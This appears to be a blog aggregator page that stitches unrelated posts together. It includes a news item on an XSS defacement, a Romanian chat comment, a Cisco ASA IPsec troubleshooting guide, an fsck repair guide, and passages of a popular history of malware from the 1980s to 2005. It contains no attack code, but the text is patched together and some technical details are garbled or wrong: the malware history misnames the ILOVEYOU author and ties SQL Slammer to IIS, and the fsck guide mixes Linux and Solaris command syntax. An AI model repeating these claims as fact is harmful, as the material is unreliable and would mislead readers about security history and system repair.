Aerosol

A Singapore-based hacker was sentenced to two months in jail after he hacked into the Singapore prime minister's website and injected unauthorized code. The Straits Times reports that Mohammad Azhar Tahir defaced the site in 2013 with messages and images from the hacktivist group Anonymous, including a Guy Fawkes mask. Tahir ultimately received a sentence of six months after tacking on separate sentences he'd received previously. These other incidents involved stealing a neighbor's wireless service and posting on a TV star's social media channels. Tahir used a cross-site scripting (XSS) attack to alter the prime minister's website. He inputted HTML code into a Google search bar embedded on the site. Similarly, a Singapore-based doctoral student identified a XSS vulnerability in The Weather Channel's website earlier this month that could have left up to 75 percent of its pages vulnerable. Source

@wikedx este reala cat despre in fiecare episod se gaseste ceva de valoare stii vorba aia "gunoiul unora e comoara altora" Storage Wars - Wikipedia, the free encyclopedia este Reality television ex: Reality television - Wikipedia, the free encyclopedia

Ma uitat pe net si am gasit 2 video-tutoriale foarte interesante. #1 #2

Ipsec tunnels are only bringed up if there is intresting traffic that needs to be encrypted. Unless there's trafic from source to a needed destination defined in crpyto policy, tunnel will not be in active state. To manualy simulate packet flow, we can use asa "packet-tracert" tool. It is also good for other traffic flow simulations and debugging. Syntax is simple: packet-tracert input interface_name protocol source_address src_port destination_address dst_port Example, simulating traffic from 192.168.1.33 port 8456 to 192.168.2.22 port 80. In Phase11, and Phase12 can be seen that packets from this source to destination addresses gets crypted and goes through the VPN tunnel: ASA-A#packet-tracer input inside tcp 192.168.1.33 8456 192.168.2.22 80 Phase: 1 Type: ACCESS-LIST Subtype: Result: ALLOW Config: Implicit Rule Additional Information: MAC Access list Phase: 2 Type: FLOW-LOOKUP Subtype: Result: ALLOW Config: Additional Information: Found no matching flow, creating a new flow Phase: 3 Type: ROUTE-LOOKUP Subtype: input Result: ALLOW Config: Additional Information: in 0.0.0.0 0.0.0.0 outside Phase: 4 Type: IP-OPTIONS Subtype: Result: ALLOW Config: Additional Information: Phase: 5 Type: INSPECT Subtype: np-inspect Result: ALLOW Config: Additional Information: Phase: 6 Type: INSPECT Subtype: inspect-pptp Result: ALLOW Config: class-map class-default match any policy-map global-policy class class-default inspect pptp service-policy global-policy global Additional Information: Phase: 7 Type: NAT-EXEMPT Subtype: Result: ALLOW Config: nat-control match ip inside 192.168.1.0 255.255.255.0 outside 192.168.2.0 255.255.255.0 NAT exempt translate_hits = 57843, untranslate_hits = 17148 Additional Information: Phase: 8 Type: NAT Subtype: Result: ALLOW Config: nat (inside) 1 192.168.1.0 255.255.255.0 nat-control match ip inside 192.168.1.0 255.255.255.0 outside any dynamic translation to pool 1 (207.139.133.118 [Interface PAT]) translate_hits = 867276, untranslate_hits = 67836 Additional Information: Phase: 9 Type: NAT Subtype: host-limits Result: ALLOW Config: nat (inside) 1 192.168.1.0 255.255.255.0 nat-control match ip inside 192.168.1.0 255.255.255.0 inside any dynamic translation to pool 1 (No matching global) translate_hits = 0, untranslate_hits = 0 Additional Information: Phase: 10 Type: HOST-LIMIT Subtype: Result: ALLOW Config: Additional Information: Phase: 11 Type: VPN Subtype: encrypt Result: ALLOW Config: Additional Information: Phase: 12 Type: VPN Subtype: ipsec-tunnel-flow Result: ALLOW Config: Additional Information: Phase: 13 Type: IP-OPTIONS Subtype: Result: ALLOW Config: Additional Information: Phase: 14 Type: FLOW-CREATION Subtype: Result: ALLOW Config: Additional Information: New flow created with id 1420869, packet dispatched to next module Result: input-interface: inside input-status: up input-line-status: up output-interface: outside output-status: up output-line-status: up Action: allow With the command "show crypto isakmp sa" You can check the state of IPsec VPN tunnels. If the SA is in "MM_ACTIVE" state, it means the tunnel is succesfuly established: ASA-A#show crypto isakmp sa Active SA: 1 Rekey SA: 0 (A tunnel will report 1 Active and 1 Rekey SA during rekey) Total IKE SA: 1 1 IKE Peer: 20.1.120 Type : L2L Role : responder Rekey : no State : MM_ACTIVE Possible ASA isakmp states with the breif description: * MM_WAIT_MSG2 Initial DH public key sent to responder. Awaiting initial contact reply from other side. If stuck here it usually means the other end is not responding. This could be due to no route to the far end or the far end does not have ISAKMP enabled on the outside or the far end is down. * MM_WAIT_MSG3 Both peers have agreed on the ISAKMP policies. Awaiting exchange of keyring information. Hang up’s here may be due to mismatch device vendors, a router with a firewall in the way, or even ASA version mismatches. * MM_WAIT_MSG4 In this step the pre-share key hashes are exchanged. They are not compared or checked, only sent. If one side sends a key and does not receive a key back, this is where the tunnel will fail. Also possible that remote side has the wrong Peer IP address. Hang up’s here may also be due to mismatch device vendors, a router with a firewall in the way, or even ASA version mismatches. * MM_WAIT_MSG5 This step is where the devices exchange pre-shared keys. If the pre-shared keys do not match it will stay at this MSG. Also tunnel may stop here when NAT Traversal was on when it needed to be turned off. * MM_WAIT_MSG6 This step is where the devices exchange pre-shared keys. If the pre-shared keys do not match it will stay at this MSG. Also tunnely may stop here when NAT Traversal was on when it needed to be turned off. However, if the state goes to MSG6 then the ISAKMP gets reset that means phase 1 finished but phase 2 failed. Check that IPSEC settings match in phase 2 to get the tunnel to MM_ACTIVE. * AM_ACTIVE / MM_ACTIVE The ISAKMP negotiations are complete. Phase 1 has successfully completed. The "show crypto ipsec sa" command verifies that data is being successfuly encrypted and decrypted. The output field #pkts encrypt:1989 and #pkts decrypt:1920 show that we have bi-directionally data encryption: ASA-A#show crypto ipsec sa interface: outside Crypto map tag: ASA1VPN, seq num: 10, local addr: 100.100.100.1 access-list LAN1-to-LAN2 permit ip 192.168.1.0 255.255.255.0 192.168.2.0 255.255.255.0 local ident (addr/mask/prot/port): (192.168.1.0/255.255.255.0/0/0) remote ident (addr/mask/prot/port): (192.168.2.0/255.255.255.0/0/0) current_peer: 200.200.200.1 #pkts encaps: 1989, #pkts encrypt: 1989, #pkts digest: 1989 #pkts decaps: 1920 , #pkts decrypt: 1920 , #pkts verify: 1920 #pkts compressed: 0, #pkts decompressed: 0 #pkts not compressed: 1989, #pkts comp failed: 0, #pkts decomp failed: 0 #pre-frag successes: 0, #pre-frag failures: 0, #fragments created: 0 #PMTUs sent: 0, #PMTUs rcvd: 0, #decapsulated frgs needing reassembly: 0 #send errors: 0, #recv errors: 0 local crypto endpt.: 20.1.1.10, remote crypto endpt.: 20.1.1.20 path mtu 1500, ipsec overhead 58, media mtu 1500 current outbound spi: 3CFDDAE7 inbound esp sas: spi: 0x0647B7A6 (105363366) transform: esp-aes-192 esp-sha-hmac none in use settings ={L2L, Tunnel, } slot: 0, conn_id: 2, crypto-map: ASA1VPN sa timing: remaining key lifetime (kB/sec): (4274994/26580) IV size: 8 bytes replay detection support: Y outbound esp sas: spi: 0x3CFDDAE7 (1023269607) transform: esp-aes-192 esp-sha-hmac none in use settings ={L2L, Tunnel, } slot: 0, conn_id: 2, crypto-map: ASA1VPN sa timing: remaining key lifetime (kB/sec): (4274956/26568) IV size: 8 bytes replay detection support: Y If want to enable detailed loggin for debugging, You can use command "debug crypto isakmp number". Number is 1-255. 1 is default and shows least debuggin messages, 255 shows the most: ASA-A#debug crypto isakmp 1 ASA-A#no debug all (if want to disable all debugging messages, simply enter command "no debug all") Continue reading on Cisco ASA Packet capturing... Source

Fsck utility Filesystem on Linux OS or any other OS in some situations can get corrupted. This can happen due to reasons like abnormal shutdown, hardware malfunctioning, switching off the system without proper shutdown procedure or power failure. Due to these reasons the superblock in a file system is not correctly updated and has mismatched information relating to system data blocks, free blocks and inodes. A corrupted Linux filesystem can be repaired with the program called "fsck". The system utility fsck "file system check" or "file system consistency check" is a tool for checking the consistency of a file system in Linux and Unix-like operating systems. ( Important: Before any action is taken, File systems must be unmounted. It's not possible to repair the filesystem while it's running because it's changing constantly and fsck may see those changes as inconsistencies and may corrupt the file system even more. Fsck should always be run in a single user mode. Running fsck on a mounted filesystem could do SEVERE damage.) FSCK options overview: -f switch - force the file system check regardless of its clean flag -p switch - fixes minor problems without user interaction (safe repair during the booting process) -y switch - gives permission to correct every problem found without users interaction -n switch - indicates to only search (and not correct) problems -b=n - n is the number of next super block if primary super block is corrupted in a filesystem fsck checks the filesystem in 5 phases: phase 1 – Check Blocks and it's Sizes phase 2 – Check Pathnames phase 3 – Check Connectivity phase 4 – Check Reference Counts phase 5 – Check Cylinder Groups The most simple variant to run fsck is to force fsck on restart, and then restart your system: LinuxBox# touch /forcefsck or LinuxBox# shutdown -rF now Command to check corrupted and unmounted filesystem would simply be fsck /dev/xxx where /dev/xxx is corrupted partition or filesystem: LinuxBox# fsck /dev/sda1 Another option is to swich the system to runlevel 1, to log-out any users, unmount all partitions and run fsck. After repair, remount all drives and continue to runlevel to 3: 1) Take system down to runlevel one (single user-mode): LinuxBox# init 1 (all commands should be run as root user) 2) Unmount file system, for example if it is /dev/sda3 file system then type command: LinuxBox# umount /dev/sda3 3) Run fsck on the partition: LinuxBox# fsck -t ext3 /dev/sda3 (Specify the file system type using -t option. By default, fsck assumes ext2 file system. Notice: If you dont specify correct filesystem, result could be even more corruption.) If don't know which filesystem type to define, You can use mount command which will display the type. To check and repair file system without fsck asking any questions, use -y option: LinuxBox# fsck -t ext3 -y /dev/sda3 (If any files are recovered, they are placed in /home/lost+found directory by fsck command.) 4) Once fsck finishes, file system can be remounted: LinuxBox# mount /dev/sda3 5) switch to multiuser mode again: LinuxBox# init 3 Here are also some of the fsck error messages & solutions: 1. Corrupted superblock – fsck fails to run If the superblock is corrupted the file system still can be repaired using alternate superblock which are formed while making new file system: LinuxBox# newfs -N /dev/sda1/c0t0d0s3 The first alternate superblock number is 32 and others superblock numbers can be found. To run fsck using first alternate superblock following command can be used: LinuxBox# fsck -F ufs -o b=32 /dev/rdsk/c0t0d0s3 2. Link counter adjustment fsck can find mismatch between directory inode link counts and actual directory links and prompts for adjustment. Link count adjustments are considered to be a safe operation in a file system and should be repaired by giving ‘y’ response to the adjust ? prompt during fsck. 3. Free Block count salvage During fsck the number of free blocks listed in a superblock and actual unallocated free blocks count does not match. fsck informs this mismatch and asks to salvage free block count to synchronize the superblock count. This error can be corrected without any potential problem to the file system or files. 4. Unreferenced file reconnection While checking connectivity fsck can find some inodes which are allocated but not referenced – not attached to any directory. Answering y to reconnect message by fsck links these files to the lost+found directory with their inode number as their name. To get more info about the files in lost+found ‘file’ command can be used to see the type of files and subsequently they can be opened in their applications or text editors to find out about their contents. If the file is found to be correct it can be used after copying to some other directory and renaming it. Source

I remember the eager anticipation that led to the turn of century. All throughout 1999, all I ever saw or heard in the media was millenium this, millenium that. Sure, the Gregorian calendar is a completely human invention. But it has a strong social impact on our lives. Many people in Western history never experienced a century turn. Most would never experience a millenium turn, because it only happens once every thousand years. Depending on the era, people rarely lived beyond age 50, 60 or 80. But as the turn of the millenium was a human invention, it affected other human inventions. By the end of the 20th century, computing had already entered our lives in a wide variety of facets. In fact, we were already dependent on it. (Yes, I know the 21st century started on January 1st, 2001. But the turn of the millenium definitely happened as December 31st, 1999 became January 1st, 2000.) All computers run by clocks. One manages the data bus and the CPU, and the other runs the system time as maintained by firmware. The firmware in most PCs and servers record dates according to the Gregorian calendar. But as basic computing processes can calculate numbers faster than character strings that need to be converted into numbers, the dates in system time are in a numerical format- 12/31/99 or 31/12/99 for example. The standards developed by major OEMs in the 20th century, such as IBM, kept to a nice and balanced two digits, two digits, two digits. Either the new millenium didn’t occur to these technology developers, or they figured their systems would be replaced before the year 2000. Either way, our banking, governmental and institutional computing systems were going to think it was the year 1900 in the year 2000. The news media worldwide lept at this particular bug report, frequently misunderstanding it. So, ordinary people thought they were going to lose the money in their bank accounts, the electricity would shut down, and all hell would break loose. Some people even stocked up on canned goods and other emergency supplies, awaiting speculated disaster. Well, throughout 1999, the media buzz likely spurred the tech industry to double their efforts. So much patching and other systematic repairs were done, that as January 1st, 2000 rolled in, few people noticed any problems at all. What an ordinary person with a home PC or an office job should have actually been worried about was ILOVEYOU. In this fourth article in my series, malware events greatly multiply in frequency. So in my research, I’ve had to carefully consider which malware to write about. The ones I’ve chosen are the ones I’ve deemed to be the biggest “game changers.” The malware that affected the greatest numbers of people, and the malware that set trends in malware development are the few I’ve selected to cover. ILOVEYOU It’s human nature to want love, affection, and validation. Most trojan developers understand that need, and often choose to exploit it. For instance, if you don’t surf the web with an ad blocker or use a strong spam filter with your email- how many times have you heard that hot Russian women want to meet you right now? I’m a Canadian woman, and they can’t even resist me. Sure, that sort of spam probably targets sexuality, but a need for love is a factor too. Reomel Lamores of the Phillipines understood that aspect of human nature very well. In May 2000, he was a computer programmer who worked for China Bank. He liked to play around with Visual Basic. Some people speculate that Lamores wanted to wreak havoc. Lamores himself claims that he was just experimenting with his programming and that he didn’t intend for his code to escape. But if he didn’t want his code to escape, why did he make a trojan? Trojan malware works by fooling users with social engineering. Unlike malware that aren’t trojans, they can’t spread without the intervention of end users. Like many trojans, ILOVEYOU primarily spread via email. The subject headings of the emails contained a string roughly like “ILOVEYOU,” hence its name. The body said, “kindly check the attached LOVELETTER coming from me.” So, I suppose the idea was that end users were intended to be fooled into thinking they had some sort of secret admirer. Most end users, particularly back in the year 2000, don’t know to be suspicious of attachments with two file extensions, especially if one of the extensions is an executable. Lamores didn’t even bother to hide the Visual Basic extension, so the name of the attachment was LOVE-LETTER-FOR-YOU.TXT.vbs Why would he go to that effort to deceive if he didn’t intend for his code to escape? I don’t believe the claims he made after he was caught, so he’s not as effective of a liar as he thought he was. As it was a Visual Basic script, it targeted Microsoft Outlook and Windows. Back in 2000, no other operating system platform or email client was anywhere near as prevalent. The script made changes in two of the most crucial registry keys: HKLMSoftwareMicrosoftWindowsCurrentVersionRunMSKernel32 and HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesWin32DLL ILOVEYOU would then create a malicious Internet Explorer shortcut on the desktop, send a webpage to many other people via IRC, and change a large number of scripting and media files to malicious VBS files that would keep propagating the worm to various email and IRC contacts. And so on, and so forth. The Register estimated that many millions of people worldwide were affected, and possibly hundreds of millions of dollars were lost. Hopefully, the ILOVEYOU incident was indication to the Phillipines’ government that their criminal code needed to be updated for the 21st century, because at the time there was no crime Lamores could be charged with under Filipino law. Slam Dunk In July 2002, IT security scientist David Litchfield discovered a vulnerability in Microsoft SQL Server and Microsoft SQL Server Desktop Engine. Considering how Microsoft’s IIS webserver dominated the market, especially then, the potential for destruction was immense. It was a buffer overflow vulnerability. Software developers understand intimately how that sort of memory management problem can cause machines and systems to crash and disable like crazy. Fortunately, once Microsoft became aware of the bug, they quickly patched it. Unfortunately, it seems that countless institutions and corporations weren’t patch managing their IIS servers properly. Oops! On January 25th, 2003, disaster stuck, and its name was SQL Slammer. The name was based on the programs it targeted, as it wasn’t written in SQL. When servers caught SQL Slammer, no other worm in history, not even ILOVEYOU, ever spread so quickly. Once a Microsoft-based machine caught an infection, 376 bytes would be sent to UDP port 1434. Then, enough packets would be sent to that port to cause a DoS (denial of service) attack, causing the server to crash. The payload would be sent to other connected webservers, causing huge numbers to crash, all in a matter of a couple of days. Millions of people found that many of their favorite websites and web services didn’t work properly, or would be unavailable altogether. If anything could be learned from the incident, it’s the principle of patching. Patch your servers and clients daily if possible! That sort of measure likely would’ve prevented SQL Slammer’s immense destruction. “I don’t have to worry about viruses, I’ve got a Mac!” I still hear this myth from the mouths of end users today, especially Apple fanboys and fangirls. “I don’t have to worry about viruses, I’ve got a Mac!” Once this series of mine entered the 1990s, Microsoft Windows became well established as the computing platform of choice for the overwhelming majority of end users and businesses worldwide. That market dominance, coupled with no file-level permissions in client Windows until Windows XP’s release in 2001, led to an environment where the vast majority of malware targets were Microsoft products. So, it’s still popularly believed that malware is a problem exclusive to Windows. By 2003, Apple’s new BSD/Unix-based platform, Mac OS X, was already rather popular with many users, particularly those who work in digital media. Mac OS X is definitely more secure because it’s based on that tried and tested Unix code. And in the early 2000s, OS X had less than 5% of microcomputer marketshare. So, an operating system that was more difficult to exploit, coupled with only having a minority install base, made it seem like the platform was invulnerable. If you’re a malware developer, which platform would you target? One based on the inherently less secure MS-DOS and NT kernels, on over 90% of PCs? Or the one based on the considerably more secure BSD/Unix kernel, with a minority of installs? The answer should be obvious. But my fiance Sean Rooney wanted to prove to doubters that Mac OS X malware was indeed possible, so he created a proof-of-concept back in 2003 that knocked people’s socks off. Surely enough, it wasn’t too long after that the probable first Mac OS X malware was found. Its name was Renepo, discovered in 2004. Unlike the other malware featured in this article, Renepo wasn’t designed to spread via the Internet. Instead, it spread via removable media, so it affected fewer machines. So, Renepo should be a reminder to those of us in the IT security community that malware can still spread by infected disks, and can indeed affect Apple products. Renepo was a shell script that could disable firewalls, crack passwords, and disable updates. It was truly nasty stuff, indeed. Amphimix Renepo was a precursor of things soon to come. The next major Mac OS X malware hit the scene mere months afterwards. By 2004 and 2005, iPod was already a moneymaker for Apple of the likes they never had before. Initially released in 2001, a few years later the music player line was still a must-have toy, and it caused mp3 files to become immesely popular. Apple’s iPod, and iPhones and iPads today require iTunes to be installed on the PCs they’re mounted to, in order for Apple’s DRM to work properly. (Unless you know how to crack it, of course.) It was a good marketing decision to develop iTunes for Windows, in addition to OS X. Months after Renepo, Amphimix was discovered. It was a file-binded mp3 that spread via P2P, email, IRC, the web, and FTP. When played in iTunes on either platform, wild laughter could be heard. And if the iTunes install was in OS X, Amphimix could cause major trouble. Like Renepo, firewalls and AV shields were disabled. Unlike Renepo, the DNS records on infected Macs were altered. When users used DNS to surf the web, they’d be redirected to malicious IP addresses. Amphimix was a major troublemaker for Macs in 2004 and 2005. The next article in my series is the final one. I’ll cover important malware events from 2006, up until present day in 2014. My teachers in school taught me that in order to prevent problems in the future, we must understand problems from the past. Hence, it’s vital to study history! I look forward to getting you caught up to the history of malware up to now, so we can prevent the serious destruction of computing systems in the future. Malware is a bigger issue than ever, and I figure it’ll only get worse as time goes on. References No sorry from Love Bug author- The Register No 'sorry' from Love Bug author • The Register The Love Bug: A Retrospect- Rixstep The Love Bug: A Retrospect | Rixstep Industry Watch W32.SQLEXP.Worm- Symantec.com W32.SQLExp.Worm | Symantec Inside the Slammer Worm- IEEE Security and Privacy Magazine http://cseweb.ucsd.edu/~savage/papers/IEEESP03.pdf 10 years of Mac OS X malware- We Live Security 10 years of Mac OS X malware Detailed Analysis/Renepo-A- Sophos http://sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/SH~Renepo-A/detailed-analysis.asp Straight facts about Mac Malware- ESET http://eset.com/int/mac-malware-facts/ Amphimix-A- Panda Security Free AntiVirus Protection & Programs - Panda Security Detailed Analysis/Amphimix-A- Sophos Detailed Analysis - Mac/Amphimix-A - Viruses and Spyware - Web Threat, Virus and Spyware Detection and Removal | Sophos - Threat Center - Cloud Antivirus, Endpoint, UTM, Encryption, Mobile, DLP, Server, Web, Wireless Security, Network Storage and Nex Source

In my previous article, I explained what happened to the evolution of malware when microcomputers started to become a major presence in small offices and households. That coincided with the exploding popularity of Microsoft’s MS-DOS and Windows 3.1. The file systems they were based on, FAT16 and later on, FAT32, totally lacked file and folder level privileges, so it was easy for targeted malware to cause huge problems. During the period covered in the last article, commerical ISPs made their debut. So people outside of academic settings started using email, USENET, and other Internet services. By 1991, Sir Tim Berners-Lee invented the web. In early 1993, I was on the web for the first time, and my very first web browser was the brand new Mosaic. In response to how Mosaic made the web accessable for many people, Netscape entered the scene. I was one of the lucky few to beta test Navigator 1.0 in November 1994. What was really cool was that I could see content and text loading in my webpages before they were completely downloaded. As we had a 16 kbps modem, I really appreciated that. Netscape, and soon after, Internet Explorer, brought the web into millions of homes for the very first time. That made the Internet a lot more popular. To this very day, I encounter end users who think the Internet and the web are one and the same. Argh! So, there opened a huge new vector for malware, and the Internet overcame floppy disks as the leading cause of malware distribution. And now, the history of malware is starting to get very interesting… Don’t Call My Name, Leandro The Michelangelo virus, as mentioned in my previous article, was the first “time bomb” virus to become notably widespread. It seemed like that from then on, “time bombs” started to become very popular. The antivirus community initially encountered the Leandro virus in 1993. As it was a “time bomb,” it was set to go off on a particular date. In Leandro’s case, that date was October 21st of the year of infection. Based on my research, if a PC got infected after October 21st of a calendar year, it likely would go off on that date in the following calendar year. But like many of the earlier viruses to create a big splash, it was kind enough to print a message for the user. This was Leandro’s message: Leandro and Kelly ! GV-MG-Brazil You have this virus since XX-XX-XXXX The date of infection, whichever date that was, as it would vary in each incidence, would be in it. Leandro was often spread via shareware on floppies, but as Internet usage started to grow rapidly, it was found to spread via BBS as well. I remember downloading quite a bit of shareware through BBS, so that was likely a primary vector. It was especially nasty, because it targetted the MBR of floppy disks and HDDs. So, although it could enter a system via Windows and MS-DOS vulnerabilities, it could then impact completely unrelated operating systems as well, such as the very first GNU/Linux distros. Leandro kept infecting machines for at least a few more years, into the late 1990s. Few Windows users ran antivirus software those days, or even knew what antivirus software was. So I imagine that after Leandro made an operating system unusable on a particular year’s October 21st, an awful lot of HDDs were thrown out. It’s difficult to determine how many disks were infected, as most people didn’t report their infections to antivirus vendors. Maybe it caused more disks to enter landfills than cartridges of E.T. for Atari, but we’ll never know for sure. Freddy Around the same time, Freddy was discovered. Like Leandro, it appeared to come from Brazil. Like the other viruses mentioned in this article and the previous one, it targeted Windows. .COM and .EXE executables were affected, especially COMMAND.COM. Remember how crucial that file was? Once Freddy infected a Windows machine, every time a user launched an executable, that executable, plus a .COM file in the same directory, would become infected. The size of each infected file would grow even more, as more and more files on the same disk acquired Freddy code. So it had a devastating snowball effect that could soon crash a machine due to memory overload. In time, an infected PC wouldn’t be able to run for more than a few seconds after booting the OS. The string “Freddy Krg” could be found encrypted in infected files. So we can easily summize what the developer’s inspiration was. A Concept is Enough to Prove My Point Concept was the first really significant Macro virus, discovered in July 1995. It coincided with Microsoft Word surpassing WordPerfect in word processor market dominance. MS Word 6.0 and MS Word 95 were affected. Macros made life for frequent Word users, like my late novelist father, a lot easier. But macro creation in those versions of Word wasn’t very secure. It’s easy to blame Microsoft developers for having a lax attitude toward security. But macros were popular in WordPerfect as well, which Microsoft didn’t develop. Even antivirus vendors, at the time, were unprepared for macro viruses. Concept was the first macro virus that made them really take notice, and it revolutionized how they developed malware signatures. Concept was also notable as the first significant virus to spread via email. As a large percentage of mid-1990s email users were using AOL, the sound of “you’ve got mail” was often the harbinger of doom! After opening an infected Word document, Concept would go on to infect the NORMAL.DOT template, and then other templates as well. The macros that Concept contained were AAAZAO, AAAZFS, AutoOpen, FileSaveAs, and PayLoad. PayLoad was especially interesting. Its name was a misnomer, because it was no payload at all. It just contained this text: Point proven? The best case scenario would be if a user didn’t have important documents that used infected templates. Then, they could simply backup those documents, then uninstall and reinstall Word. It was useful that people usually had factory created install floppies and CDs those days. Concept infected more machines than any other malware into the late 1990s. Melissa Concept’s destructive success paved the way for the Melissa virus, which was the second malware to spread to a significant extent via email. Although email was its primary vector, it was initially discovered in the alt.sex USENET group, in the spring of 1999. It was first found in a file that supposedly contained passwords for 80 pornographic websites. But even when it spread through USENET, once it infected a user’s machine, it would target email clients, namely Microsoft Outlook 97 and 98. A user’s inbox would quickly flood with infected email, and send infected emails to addresses in a user’s address book. Some users were so scared of Melissa that they’d disconnect their PCs from the Internet entirely. It’s a shame, because reinstalling Outlook probably would have done the trick, as would running a malware scan once antivirus vendors had a signature for it. Considering the erotic theme of the virus, it didn’t come as much of a surprise that Melissa was named after a stripper. An investigation led by the FBI found Melissa’s creator later that year. It was New Jersey resident David L. Smith. On December 10th, 1999, he was sentenced to ten years of prison. But Mr. Smith only served twenty months, so he was released just as the 21st century started. Which segues nicely into my next article. Because although the Y2K bug was what got ordinary people into a panic, what they really should have worried about was ILOVEYOU… References Trend Micro Threat Encyclopedia, Leandro Trend Micro Threat Encyclopedia | Latest information on malware, spam, malicious URLs, vulnerabilities Panda Security, Leandro Virus Encyclopedia | Information | Evolution | Protection - Security Information - Panda Security ESET Threat Encyclopedia, Leandro Leandro | ESET Threat Encyclopedia McAfee, Leandro Recent Malware - McAfee Labs Threat Center F-Secure, Freddy http://www.f-secure.com/v-descs/freddy.shtml VSUM, Freddy virus Online VSUM - Freddy Virus Concept, The Virus Encyclopedia Concept - The Virus Encyclopedia Concept virus, Dr. Nikolai Bezroukov Concept CERT, Melissa Macro Virus https://www.cert.org/historical/advisories/CA-1999-04.cfm March 26th 1999, Melissa Wreaks Havoc on the Net, Wired.com March 26, 1999: 'Melissa' Wreaks Havoc on Net | WIRED 10 Worst Computer Viruses of All Time, How Stuff Works Worst Computer Virus 10: Melissa - HowStuffWorks Source

In my previous article, I told the story of the very first worms and viruses. Interestingly, a groundbreaking mathemetician, John von Neumann, and a science fiction novelist, John Brunner, conceptualized them before anyone ever coded them. We often see this sort of thing in the world of science and technology. One of the most frequently cited examples is how Star Trek creator Gene Roddenberry predicted smartphones and tablets, and the Enterprise crews in the original series and The Next Generation used very similiar looking and behaving devices accordingly. People in science, technology and academia used computers and the Internet decades before ordinary people. The advent of PCs, Berners-Lee’s “World Wide Web,” and ARM-based mobile devices, in that order, brought computing and computer networking into everyone’s lives. There are two key differences between the events in my first article, and the events in this one. In the first article, pretty much only people in STEM were using computers, ARPAnet and the Internet. So, the harm done by the very first generation of malware would only affect niche groups of people. The second key difference is that the first generation of malware was all experimental rather than malicious in intent. An understanding of the history of hacker culture will demonstrate that computer programmers and technicians, especially the earliest ones, were powerfully driven by the pursuit of knowledge. I have a strong feeling that some of the strings in the earliest malware, such as “I’m the Creeper, catch me if you can!” and the copyright messages in the Brain series of viruses, were intended to be playful with other people in their field. Insider jokes, if you will. As the late 1980s led into the 1990s, it became increasingly common to see microcomputers not only in offices, but in households as well. I remember being marveled by all the time I spent playing with Commodore 64s when I was a little girl. They really were a big deal back then. Then in late 1992, my family got a 486 running Windows 3.1, and I was probably the very first kid in school with Internet access at home. Even at that young age, I could see how these technologies would be radically changing people’s lives. The “early adopter” status of my childhood household likely played a major role in how I grew up to be an IT security researcher. So it’s worth noting that the second generation of malware, the focus of this article, was probably the first to affect doctor’s offices, receptionists, people filing their income taxes from home, and little girls who felt compelled to download Apogee games from a BBS. (Thanks, Dad!) Look Ma! No Permissions! Microsoft Windows 3.1 was a major factor in getting personal computers into households and offices in the early 1990s, even though Commodore’s Amiga platform dominated Europe. But until Windows XP was released in 2001, on the client side, Windows was simply a GUI for MS-DOS. That meant that its partition would be formatted with some version of FAT (File Allocation Table) or another. All versions of FAT lack support for multiuser operating systems, and coincidingly lack any sort of file or folder level permissions. Boot up the machine, and you have full access to everything, no passwords or cracking necessary. What’s especially concerning is that Windows 3.1, 95 and 98 were the first operating systems millions of people around the world used to access the Internet. Although malware can easily be transmitted via removable media, such as floppy disks and optical discs, the Internet opened up the largest vector for malware in computing history. ARPAnet started in 1969, and the modern Internet, complete with commercial ISPs, started in the late 1980s. Well, when most of us were using MS-DOS based Windows operating systems to access the Internet in the late 1980s and the 1990s, we were opening up our PCs to a massive malware source with no user account or file system protections whatsoever. If an executable file, regardless of where it came from, launched on our PCs, it wouldn’t even have to struggle in any way to wreak havoc. When there are no permissions, everything is automatically permitted. By 1989, Windows 2.1 and MS-DOS 4.01 were Microsoft’s most current x86 operating systems. OS/2 only ran on PS/2 hardware. Although IBM’s PS/2 microcomputers used x86, they never commerically took off like “IBM PC compatible” machines did. Though, we still see a remnant of PS/2 on a lot of our PCs even today, our PS/2 keyboard and mouse ports. Windows 1.x, 2.0, and MS-DOS 3.3 and older versions were still in frequent use. That was the environment we were in in the world of Microsoft computing, when the first malware to have a significant impact on that platform was discovered. Ghostball Icelandic computer whiz Friðrik Skúlason discovered the Ghostball virus in October 1989. It evolved from Vienna. The first Vienna virus was discovered in April 1988 by Franz Swoboda, and eventually there were hundreds of variants of it. (Skúlason went on to found antivirus firm F-Prot in 1993.) Ghostball, like Vienna, was a .COM executable that targetted other .COM executables in MS-DOS based operating systems. So all versions of MS-DOS and client Windows were vulnerable. By changing the time stamp of files to 62 seconds (which would not be converted to 1:02), the whole OS would crash, and a complete disk reformatting and OS reinstallation was usually necessary. It would most commonly spread via infected floppy disks, but it spread through the Internet as well. If household Internet use was even at 1997 levels, Ghostball and other Vienna variants could’ve done a lot more damage than they did. Still, at least hundreds of thousands of Microsoft-based PCs were affected, with many millions of dollars worth of hardware and data lost. Why Microsoft didn’t respond by launching a multiuser operating system, like UNIX and other common OSes have been using since at least the 1970s, I really don’t know. It was a terrible oversight, to say the least, especially considering Microsoft’s grip on OEMs. Michelangelo Italian Renaissance artist Michelangelo was born on March 6th, 1475. Back in 1991, the Michelangelo I was famillar with was the orange-masked Ninja Turtle. In February of that year, the Michelangelo virus was discovered, in either Australia or New Zealand. It was named Michelangelo because it was a boot sector “time bomb” that was coded to launch from its dormant state on his 517th birthday — March 6th, 1992. It targeted all DOS based operating systems, including all versions of Windows at the time. If a floppy disk or HDD was multiboot with a non-DOS operating system, the non-DOS operating system would still be affected because of the shared MBR. One would’ve thought that it being discovered in February 1991 would’ve given the computing world plenty of time to get rid of it before March 6th, 1992. But alas, by January 1992, it was discovered that many products, including Intel’s LANSpool print spooler, were shipped with it. Oops! Many people in the know, especially in datacenters and institutional settings, were able to rid their machines of it before Michelangelo’s 517th birthday. But antivirus programs were unheard of by most people using DOS-based PCs in offices and households. Thankfully, many of them still heard news reports, warning them to either set their BIOS clocks to March 7th, or to leave their PCs turned off on March 6th. McAfee founder John McAfee claimed millions of PCs were infected. Other reports said only hundreds of PCs were. Especially considering Mr. McAfee’s personal problems as of 2014, I don’t think we’ll ever be certain of the exact number. The First Spambots Before Sir Tim Berners-Lee’s “World Wide Web” really took off later in the 1990s, many early adopters of Internet use in offices and homes in the late 1980s and early 1990s were using email, BBS, USENET and IRC. In the early 1990s, my husband Sean Rooney was an IT security expert for the Canadian government. He could imagine spambot rootkits, in various malware varieties, taking off as more and more people started using various services on the Internet. He did, in his words, a “live-fire demonstration” of spambot malware. He tells me no one took him seriously. A few years later, by around 1996, spambot malware was seen “in the wild” for the first time. In my next article, I’ll explain the major malware events in the rest of the 1990s. That’s when things started to get really interesting… References Ghostballs- The Virus Encyclopedia: 